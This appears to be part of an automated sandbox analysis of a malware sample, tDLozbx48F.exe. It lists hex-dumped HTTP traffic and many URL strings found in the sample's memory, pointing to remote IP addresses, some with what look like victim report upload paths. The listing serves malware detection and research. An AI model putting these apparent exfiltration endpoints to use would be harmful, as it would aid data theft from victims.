Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:53:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.42.17.170:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://106.15.66.6:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://106.52.28.126:8888
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://115.231.163.168:8082
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.196.97.232:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://121.63.250.132:88
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://123.129.217.85:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://124.223.67.212:5555
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://138.201.197.74:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://139.224.8.231:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52823000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52657000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://140.238.218.94:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://149.28.31.122:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://15.206.54.77:8080
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218:9090
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218:9090/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218:9090/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218:9090/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.218:9090/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B9000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.115.P
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800F6000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5268A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.86.11h
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5270D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121.16
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121.16:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52708000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121.16:8080/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5270D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121.16:8080/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.121P
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52704000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.119.1h
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.178.39.50:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://175.24.204.219:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.191.188.207:80
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121:8001
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121:8001/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121:8001/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121:8001/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800B2000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.121:8001/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.1p
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159.1p2
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800E5000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.189.159P
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://189.115.56.226:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.250.190.139:80
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://218.146.86.163:8888
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://34.216.14.238:8080
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://39.96.33.40:8080
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.17
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080/6CXyo_user
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:8080/PWOYf_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.173:80802
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.17xG
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.106.P
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.10hJ
Source: tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F5800BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.226.10hrB
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.8
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83:8080/%36%43%58%79%6F%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74%2E
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83:8080/6CXyo_user%40888683_report.wsr
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.8H
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52823000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26h
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.100.180.12:80
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A351000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.110.140.182:8080
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.77.125.6
